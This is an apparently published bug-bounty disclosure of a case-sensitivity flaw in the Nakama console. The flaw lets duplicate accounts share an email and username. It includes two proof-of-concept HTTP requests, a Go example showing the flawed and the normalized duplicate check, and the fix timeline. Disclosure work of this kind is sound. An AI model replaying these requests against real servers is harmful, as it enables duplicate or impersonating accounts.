Multiple user accounts via same email and username in heroiclabs/nakama

Valid

Reported on Sep 4th 2022


Description

The Nakama console does not normalize letter case when creating a new user, so its duplicate checks can be bypassed to create multiple user accounts with the same email address and username.

Proof of Concept

HTTP Request #1

POST /v2/console/user HTTP/1.1
Host: 192.168.1.16:7351
Authorization: Bearer <token>
Cookie: <cookies>

{"username":"test","email":"test@example.com +","password":"Test1234","role":4,"newsletter_subscription":false}

HTTP Request #2

POST /v2/console/user HTTP/1.1
Host: 192.168.1.16:7351
Authorization: Bearer <token>
Cookie: <cookies>

{"username":"test","email":"test@Example.com +","password":"Test1234","role":4,"newsletter_subscription":false}

Notice that the "E" in the email address is uppercase in the second request, which evades the duplicate-email check. The same trick applies to the username.
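The gap the report describes, as an added Go example that is not Nakama's own code: a constructed in-memory registry whose duplicate check either compares identifiers verbatim (reproducing the reported behaviour) or after trimming and case folding (the hardened check). The names normalize, Registry and Create are illustrative, not Nakama's.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// ErrDuplicate signals that the username or email is already registered.
var ErrDuplicate = errors.New("username or email already in use")

// normalize trims whitespace and folds case so that "test@Example.com" and
// "test@example.com" produce the same lookup key. Assumption for this example:
// both identifiers are treated as case-insensitive (Nakama's actual fix may differ).
func normalize(s string) string {
	return strings.ToLower(strings.TrimSpace(s))
}

// Registry is a constructed in-memory stand-in for the console's users table.
// foldCase=false reproduces the reported behaviour; foldCase=true is the hardened check.
type Registry struct {
	users    map[string]bool
	emails   map[string]bool
	foldCase bool
}

func NewRegistry(foldCase bool) *Registry {
	return &Registry{users: map[string]bool{}, emails: map[string]bool{}, foldCase: foldCase}
}

// Create rejects the account if either identifier collides under the active policy.
func (r *Registry) Create(username, email string) error {
	u, e := username, email
	if r.foldCase {
		u, e = normalize(username), normalize(email)
	}
	if r.users[u] || r.emails[e] {
		return ErrDuplicate
	}
	r.users[u], r.emails[e] = true, true
	return nil
}

func main() {
	for _, fold := range []bool{false, true} {
		r := NewRegistry(fold)
		_ = r.Create("test", "test@example.com")                                  // request #1
		fmt.Printf("foldCase=%v: %v\n", fold, r.Create("Test", "test@Example.com")) // case-variant of #1
	}
}
```

Only the folded registry rejects the second account; a real fix would apply the same normalization in the database uniqueness constraint, not just in application code.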

Impact

Violation of Secure Design Principles and Business Logic Issues

Niraj Khatiwada modified the report 7 months ago
heroiclabs/nakama maintainer has acknowledged this report 7 months ago

Niraj Khatiwada (Researcher), 5 months ago:

Any updates?

Andrei Mihu validated this vulnerability 2 months ago
Niraj Khatiwada has been awarded the disclosure bounty
Andrei Mihu marked this as fixed in 3.16.0 with commit ada6f9 2 months ago
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Feb 1st 2023
Andrei Mihu published this vulnerability 2 months ago